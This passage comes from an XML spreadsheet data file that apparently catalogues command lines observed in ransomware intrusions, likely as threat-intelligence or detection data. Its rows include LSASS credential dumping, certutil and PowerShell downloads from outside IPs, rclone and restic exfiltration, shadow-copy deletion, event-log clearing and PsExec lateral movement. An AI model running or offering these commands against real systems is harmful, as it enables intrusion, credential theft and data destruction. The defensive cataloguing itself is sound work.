    <s v="nltest-pid"/>
    <m/>
    <s v="nltest /dclist:"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="28"/>
  </r>
  <r>
    <s v="ransom-eid0859"/>
    <s v="nltest-pid"/>
    <m/>
    <s v="C:\Windows\System32\nltest.exe /dclist: &lt;DOMAIN&gt;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="19"/>
  </r>
  <r>
    <s v="ransom-eid0910"/>
    <s v="nltest-pid"/>
    <m/>
    <s v="nltest /dclist: "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="30"/>
  </r>
  <r>
    <s v="ransom-eid0911"/>
    <s v="nltest-pid"/>
    <m/>
    <s v="nltest /DOMAIN_TRUSTS"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="30"/>
  </r>
  <r>
    <s v="ransom-eid0939"/>
    <s v="nltest-pid"/>
    <m/>
    <s v="nltest /dclist"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="31"/>
  </r>
  <r>
    <s v="ransom-eid0940"/>
    <s v="nltest-pid"/>
    <m/>
    <s v="nltest /domain_trusts"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="31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31"/>
  </r>
  <r>
    <s v="ransom-eid0993"/>
    <s v="nltest-pid"/>
    <m/>
    <s v="nltest /dclist:"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="ransom-eid0994"/>
    <s v="nltest-pid"/>
    <m/>
    <s v="nltest /domain _ trusts"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="ransom-eid1028"/>
    <s v="nltest-pid"/>
    <m/>
    <s v="nltest /domain_trusts"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="ransom-eid1029"/>
    <s v="nltest-pid"/>
    <m/>
    <s v="nltest /domain_trusts /all_trusts"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="ransom-eid1075"/>
    <s v="nltest-pid"/>
    <m/>
    <s v="nltest /domain_trusts /all_trusts"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="ransom-eid1092"/>
    <s v="nltest-pid"/>
    <m/>
    <s v="cmd.ex /c nltest /domain_trusts"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="ransom-eid1143"/>
    <s v="nltest-pid"/>
    <m/>
    <s v="cmd.exe /C nltest /dclist:"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="18"/>
  </r>
  <r>
    <s v="ransom-eid1144"/>
    <s v="nltest-pid"/>
    <m/>
    <s v="cmd.exe /C nltest /DOMAIN_TRUSTS"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="18"/>
  </r>
  <r>
    <s v="ransom-eid1145"/>
    <s v="nltest-pid"/>
    <m/>
    <s v="cmd.exe /C nltest /domain_trusts /all_trusts"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="18"/>
  </r>
  <r>
    <s v="ransom-eid1170"/>
    <s v="nltest-pid"/>
    <m/>
    <s v="nltest /domain_trusts"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="ransom-eid1171"/>
    <s v="nltest-pid"/>
    <m/>
    <s v="nltest /domain_trusts /all_trusts"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="ransom-eid1232"/>
    <s v="nltest-pid"/>
    <m/>
    <s v="nltest /domain_trusts"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="ransom-eid1233"/>
    <s v="nltest-pid"/>
    <m/>
    <s v="nltest /domain_trusts /all_trusts"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="ransom-eid1256"/>
    <s v="nltest-pid"/>
    <m/>
    <s v="nltest /domain_trusts"/>
    <s v="rundll32  c:\users\&lt;&gt;\AppData\Local\Temp\easygoing.data,#1"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="ransom-eid1260"/>
    <s v="nltest-pid"/>
    <m/>
    <s v="nltest /domain_trusts /all_trusts"/>
    <s v="rundll32  c:\users\&lt;&gt;\AppData\Local\Temp\easygoing.data,#1"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="ransom-eid1332"/>
    <s v="nltest-pid"/>
    <m/>
    <s v="nltest /domain_trusts"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="32"/>
  </r>
  <r>
    <s v="ransom-eid1334"/>
    <s v="nltest-pid"/>
    <m/>
    <s v="nltest /dclist:"/>
    <s v="regsvr32.exe C:\users\&lt;&gt;\AppData\Local\&lt;rstring&gt;\&lt;random&gt;.dll"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="32"/>
  </r>
  <r>
    <s v="ransom-eid1336"/>
    <s v="nltest-pid"/>
    <m/>
    <s v="nltest /dclist:"/>
    <s v="regsvr32.exe C:\users\&lt;&gt;\AppData\Local\&lt;rstring&gt;\&lt;random&gt;.dll"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="32"/>
  </r>
  <r>
    <s v="ransom-eid1344"/>
    <s v="nltest-pid"/>
    <m/>
    <s v="nltest /trusted_domains "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="32"/>
  </r>
  <r>
    <s v="ransom-eid1372"/>
    <s v="nltest-pid"/>
    <m/>
    <s v="nltest /domain_trusts"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="13"/>
  </r>
  <r>
    <s v="ransom-eid1373"/>
    <s v="nltest-pid"/>
    <m/>
    <s v="nltest /domain_trusts /all_trusts"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="13"/>
  </r>
  <r>
    <s v="ransom-eid0009"/>
    <s v="nltest-pid"/>
    <m/>
    <s v="nltest /domain_trusts"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14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26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31"/>
  </r>
  <r>
    <s v="ransom-eid0069"/>
    <s v="pshell-pid"/>
    <m/>
    <s v="powershell Invoke-WebRequest &quot;http://temp.sh/VSlAV/http64.exe&quot; -OutFile C:\programdata\rr.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="15"/>
  </r>
  <r>
    <s v="ransom-eid0250"/>
    <s v="rundll-pid, comsvcs-pid, lsass-pid"/>
    <m/>
    <s v="rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump PID C:\ProgramData\lsass.dmp full"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1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1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1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30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8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8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24"/>
  </r>
  <r>
    <s v="ransom-eid0001"/>
    <m/>
    <m/>
    <s v="schtasks  /create /ru SYSTEM /tn &quot;OneDrive Security Task-S-1-5-21-REDACTED&quot; /tr c:\windows\adfs\py\UpdateEdge.bat /SC ONSTART /F"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14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14"/>
  </r>
  <r>
    <s v="ransom-eid0003"/>
    <m/>
    <m/>
    <s v="schtasks /create /I 1 /TR C:\Users\REDACTED\AppData\Local\Notepad\UpdateEG.bat /TN UpdateEdge /SC ONIDLE"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14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14"/>
  </r>
  <r>
    <s v="ransom-eid0005"/>
    <m/>
    <m/>
    <s v="c:\Windows\system32\cmd.exe /C rename pythonw.exe UpdateJson.exe"/>
    <s v="winlogon.exe"/>
    <m/>
    <s v="winlogon.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="ransom-eid0006"/>
    <m/>
    <m/>
    <s v="bcdedit /set {default} safeboot network"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="ransom-eid0008"/>
    <m/>
    <m/>
    <s v="ipconfig /all"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="ransom-eid0017"/>
    <s v="pshell"/>
    <m/>
    <s v="IEX (New-Object Net.Webclient).DownloadString('http://localhost:33121/'); Invoke-FindLocalAdminAccess -Thread 50"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="ransom-eid0025"/>
    <m/>
    <s v="impacket wmiexec"/>
    <s v="curl -k https://91.92.245.26/python.zip "/>
    <s v="c:\windows\system32\wbem\wmiprvse.exe -secured -Embedding"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="ransom-eid0031"/>
    <m/>
    <m/>
    <s v="cmd.exe /C PsExec64.exe -accepteula @pc.txt -c -f -d -h 1.bat"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="ransom-eid0032"/>
    <m/>
    <m/>
    <s v="bcdedit  /set {default} safeboot network"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="ransom-eid0033"/>
    <m/>
    <m/>
    <s v="findstr  /C:&quot;The operation completed successfully.&quot; "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14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14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14"/>
  </r>
  <r>
    <s v="ransom-eid0036"/>
    <m/>
    <m/>
    <s v="reg  add &quot;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon&quot; /v DefaultPassword /t REG_SZ /d JapanNight!128 /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="ransom-eid0037"/>
    <m/>
    <m/>
    <s v="reg  add &quot;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon&quot; /v AutoAdminLogon /t REG_SZ /d 1 /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14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14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14"/>
  </r>
  <r>
    <s v="ransom-eid0040"/>
    <m/>
    <m/>
    <s v="C:\Windows\System32\cmd.exe &quot;cmd&quot; /c &quot;bcdedit /set {current} safeboot network&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14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14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4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14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4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14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4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14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14"/>
  </r>
  <r>
    <s v="ransom-eid0049"/>
    <m/>
    <m/>
    <s v="C:\Windows\SysWOW64\cmd.exe &quot;cmd&quot; /c &quot;sc delete 15991160457623399845550968347370640942&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="ransom-eid0050"/>
    <m/>
    <m/>
    <s v="C:\Windows\System32\cmd.exe &quot;cmd&quot; /c &quot;bcdedit /deletevalue {current} safeboot&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="ransom-eid0051"/>
    <s v="wmic-pid "/>
    <m/>
    <s v="C:\Windows\SysWOW64\cmd.exe &quot;cmd&quot; /c &quot;wmic csproduct get UUID&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="ransom-eid0052"/>
    <m/>
    <m/>
    <s v="C:\Windows\SysWOW64\cmd.exe &quot;cmd&quot; /c &quot;iisreset.exe /stop&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14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14"/>
  </r>
  <r>
    <s v="ransom-eid0054"/>
    <m/>
    <m/>
    <s v="C:\Windows\System32\cmd.exe &quot;cmd&quot; /c &quot;vssadmin.exe Delete Shadows /all /quiet&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="ransom-eid0055"/>
    <m/>
    <m/>
    <s v="C:\Windows\SysWOW64\cmd.exe &quot;cmd&quot; /c &quot;arp -a&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="ransom-eid0056"/>
    <s v="wmic-pid "/>
    <m/>
    <s v="C:\Windows\System32\cmd.exe &quot;cmd&quot; /c &quot;wmic.exe Shadowcopy Delete&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="ransom-eid0057"/>
    <m/>
    <m/>
    <s v="C:\Windows\SysWOW64\cmd.exe &quot;cmd&quot; /c &quot;wevtutil.exe el&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="ransom-eid0058"/>
    <m/>
    <m/>
    <s v="C:\Windows\SysWOW64\cmd.exe &quot;cmd&quot; /c &quot;wevtutil.exe cl &lt;MULTIPLE EVENT LOGS&gt;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="ransom-eid0059"/>
    <m/>
    <m/>
    <s v="restic.exe -r rest:http://195.123.226.84:8000/ init --password-file ppp.txt"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14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14"/>
  </r>
  <r>
    <s v="ransom-eid0061"/>
    <m/>
    <m/>
    <s v="cmd.exe /C PsExec64.exe -accepteula \\&lt;DOMAIN-CONTROLLER-IP&gt; -c -f -d -s up.bat"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="ransom-eid0062"/>
    <m/>
    <m/>
    <s v="net  user REDACTED JapanNight!128 /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="ransom-eid0063"/>
    <m/>
    <m/>
    <s v="cmd.exe /C for /f %a in (pc.txt) do copy /y \\&lt;REDACTED&gt;\c$\&lt;REDACTED&gt;.exe \\%a\c$\&lt;REDACTED&gt;.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="ransom-eid0064"/>
    <m/>
    <m/>
    <s v="c:\windows\system32\cmd.exe "/>
    <s v="pythonw.exe wo12.py"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="ransom-eid0065"/>
    <m/>
    <m/>
    <s v="bitsadmin /transfer mydownloadjob /download /priority normal http://&lt;IP&gt;:80/download/test1.exe c:\programdata\s1.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="15"/>
  </r>
  <r>
    <s v="ransom-eid0066"/>
    <m/>
    <m/>
    <s v="certutil -urlcache -split -f http://&lt;IP&gt;:80/download/test1.exe C:\programdata\cscs.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="15"/>
  </r>
  <r>
    <s v="ransom-eid0067"/>
    <m/>
    <m/>
    <s v="certutil -urlcache -split -f http://&lt;IP&gt;:80/download/http64.exe C:\programdata\cscs.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="15"/>
  </r>
  <r>
    <s v="ransom-eid0068"/>
    <m/>
    <m/>
    <s v="certutil -urlcache -split -f http://&lt;IP&gt;:80/download/csss.exe C:\programdata\cscs.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="15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5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5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5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5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5"/>
  </r>
  <r>
    <s v="ransom-eid0091"/>
    <m/>
    <m/>
    <s v="rclone config"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="15"/>
  </r>
  <r>
    <s v="ransom-eid0092"/>
    <m/>
    <m/>
    <s v="rclone copy &lt;path&gt;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="15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5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5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5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5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5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5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5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5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5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0"/>
  </r>
  <r>
    <s v="ransom-eid0104"/>
    <m/>
    <m/>
    <s v="c:\windows\system32\rundll32.exe"/>
    <s v="cmd /c &quot;C:\windows\temp\screenconnect\23.6.8.8644\&lt;random uuid&gt;run.cmd&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="15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5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5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5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5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5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5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5"/>
  </r>
  <r>
    <s v="ransom-eid0128"/>
    <m/>
    <m/>
    <s v="&quot;C:\Users\&lt;&gt;\Desktop\netscan.exe&quot;"/>
    <s v="C:\windows\Explorer.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="15"/>
  </r>
  <r>
    <s v="ransom-eid0129"/>
    <m/>
    <m/>
    <s v="&quot;C:\Users\&lt;&gt;\Desktop\64-bit\netscan.exe&quot;"/>
    <s v="C:\windows\Explorer.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="15"/>
  </r>
  <r>
    <s v="ransom-eid0130"/>
    <m/>
    <m/>
    <s v="XCOPY /f /y &quot;c:\programdata\setup.exe&quot; &quot;\\&lt;ip&gt;\C$"/>
    <s v="c:\windows\System32\cmd.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="15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5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5"/>
  </r>
  <r>
    <s v="ransom-eid0133"/>
    <m/>
    <s v="screen connect installed"/>
    <s v="c:\windows\System32\msiexec.exe /I %LOCALAPPDAT%\TEMP\setup.msi"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="15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0"/>
  </r>
  <r>
    <s v="ransom-eid0135"/>
    <m/>
    <m/>
    <s v="attrib  +s +h /D &quot;C:\Program Files\Windows NT\*.*&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="20"/>
  </r>
  <r>
    <s v="ransom-eid0140"/>
    <m/>
    <m/>
    <s v="systeminfo "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="20"/>
  </r>
  <r>
    <s v="ransom-eid0141"/>
    <m/>
    <m/>
    <s v="whoami /groups"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="20"/>
  </r>
  <r>
    <s v="ransom-eid0144"/>
    <s v="wmic-pid "/>
    <m/>
    <s v="WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="20"/>
  </r>
  <r>
    <s v="ransom-eid0146"/>
    <m/>
    <m/>
    <s v="ping &lt;workstation1&gt;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="20"/>
  </r>
  <r>
    <s v="ransom-eid0150"/>
    <m/>
    <m/>
    <s v="ping &lt;DOMAIN&gt; "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="20"/>
  </r>
  <r>
    <s v="ransom-eid0152"/>
    <m/>
    <m/>
    <s v="&quot;C:\Program Files\WinRAR\WinRAR.exe&quot; a -ep1  -scul -r0 -iext   -imon1 -- . G:\REDACTED"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="20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0"/>
  </r>
  <r>
    <s v="ransom-eid0154"/>
    <m/>
    <m/>
    <s v="cmd.exe /c vssadmin delete shadows /all /quiet"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="20"/>
  </r>
  <r>
    <s v="ransom-eid0155"/>
    <m/>
    <m/>
    <s v="attrib +s +h /D &quot;C:\Program Files\Windows NT\*.*"/>
    <s v="C:\Windows\system32\cmd.exe cmd /c 4554.cmd"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="20"/>
  </r>
  <r>
    <s v="ransom-eid0156"/>
    <m/>
    <m/>
    <s v="cmd /c tar xf 855.zip"/>
    <s v="C:\Windows\system32\cmd.exe cmd /c 4554.cmd"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="20"/>
  </r>
  <r>
    <s v="ransom-eid0157"/>
    <m/>
    <m/>
    <s v="regsvr32 c:\programdata\2905.dll"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="20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0"/>
  </r>
  <r>
    <s v="ransom-eid0159"/>
    <m/>
    <m/>
    <s v="&quot;.1522\1522.exe&quot;"/>
    <s v="C:\Windows\system32\cmd.exe cmd /c 4554.cmd"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="20"/>
  </r>
  <r>
    <s v="ransom-eid0160"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /c echo 89ef6b4bcf &gt; \\.\pipe\8caf5e"/>
    <s v="C:\Windows\system32\dllhost.exe"/>
    <m/>
    <s v="dllhost.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="20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0"/>
  </r>
  <r>
    <s v="ransom-eid0162"/>
    <m/>
    <m/>
    <s v="c:\Windows\system32\cmd.exe /c echo e6b1e5ac4ae &gt; \\.\pipe\612990"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="ransom-eid0163"/>
    <m/>
    <m/>
    <s v="reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v DenyTSConnections /t REG_DWORD /d 0 /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0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0"/>
  </r>
  <r>
    <s v="ransom-eid0165"/>
    <m/>
    <m/>
    <s v="cmd.exe /c systeminfo"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="ransom-eid0175"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\\cmd.exe /C systeminfo"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="ransom-eid0180"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /C ping &lt;hostname redacted&gt;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="ransom-eid0181"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\taskmgr.exe /4"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0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0"/>
  </r>
  <r>
    <s v="ransom-eid0183"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /C route print"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="ransom-eid0184"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /C ping http://&lt;IP redacted&gt;/"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="ransom-eid0195"/>
    <s v="pshell-pid"/>
    <m/>
    <s v="c:\windows\system32\windowspowershell\v1.0\powershell.exe -exec bypass .\adrecon.ps1"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="16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0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16"/>
  </r>
  <r>
    <s v="ransom-eid0188"/>
    <m/>
    <m/>
    <s v="c:\windows\system32\schtasks.exe /run /tn microsoft\windows\wininet\cachetask"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="16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16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16"/>
  </r>
  <r>
    <s v="ransom-eid0193"/>
    <m/>
    <m/>
    <s v="c:\windows\system\procdump.exe -accepteula -ma lsass.exe lsass.dmp"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="16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16"/>
  </r>
  <r>
    <s v="ransom-eid0301"/>
    <s v="pshell-pid"/>
    <m/>
    <s v="powershell -nop -exec bypass -EncodedCommand"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="22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16"/>
  </r>
  <r>
    <s v="ransom-eid0197"/>
    <m/>
    <m/>
    <s v="cmd.exe /q /c c:&quot;program files (x86)\teamviewer\teamviewer.exe -info"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="16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16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16"/>
  </r>
  <r>
    <s v="ransom-eid0201"/>
    <m/>
    <m/>
    <s v="c:\windows\system32\wevtutil.exe set-log active directory web services /enabled:false"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="16"/>
  </r>
  <r>
    <s v="ransom-eid0202"/>
    <m/>
    <m/>
    <s v="c:\windows\system32\wevtutil.exe set-log application /enabled:false"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="16"/>
  </r>
  <r>
    <s v="ransom-eid0203"/>
    <m/>
    <m/>
    <s v="c:\windows\system32\wevtutil.exe set-log hardwareevents /enabled:false"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="16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16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16"/>
  </r>
  <r>
    <s v="ransom-eid0332"/>
    <s v="pshell-pid"/>
    <m/>
    <s v="powershell -nop -exec bypass -EncodedCommand"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="ransom-eid0209"/>
    <m/>
    <m/>
    <s v="cmd.exe /q /c gpupdate /force"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="16"/>
  </r>
  <r>
    <s v="ransom-eid0210"/>
    <m/>
    <m/>
    <s v="cmd.exe /c \\&lt;domaincontroller&gt;\netlogon\defender.vbs"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="16"/>
  </r>
  <r>
    <s v="ransom-eid0211"/>
    <m/>
    <m/>
    <s v="cmd.exe /c \\&lt;domaincontroller&gt;\netlogon\def.vbs"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="16"/>
  </r>
  <r>
    <s v="ransom-eid0212"/>
    <m/>
    <m/>
    <s v="cmd.exe -c \\&lt;domain controller&gt;\netlogon\&lt;num&gt;.exe --access-token &lt;token&gt;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="16"/>
  </r>
  <r>
    <s v="ransom-eid0213"/>
    <m/>
    <m/>
    <s v="cmd.exe -c \\&lt;domain controller&gt;\netlogon\&lt;num&gt;.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="16"/>
  </r>
  <r>
    <s v="ransom-eid0214"/>
    <m/>
    <m/>
    <s v="c:\windows\system32\cmd.exe /c fsutil behavior set symlinkevaluation r2l:1"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="16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16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16"/>
  </r>
  <r>
    <s v="ransom-eid0217"/>
    <m/>
    <m/>
    <s v="c:\windows\system32\cmd.exe /c cmd.exe /c for /f &quot;tokens=*&quot; %1 in ('wevtutil.exe el') do wevtutil.exe cl &quot;%1&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="16"/>
  </r>
  <r>
    <s v="ransom-eid0218"/>
    <m/>
    <m/>
    <s v="c:\windows\system32\cmd.exe /c bcdedit /set {default} recoveryenabled no"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="16"/>
  </r>
  <r>
    <s v="ransom-eid0219"/>
    <m/>
    <m/>
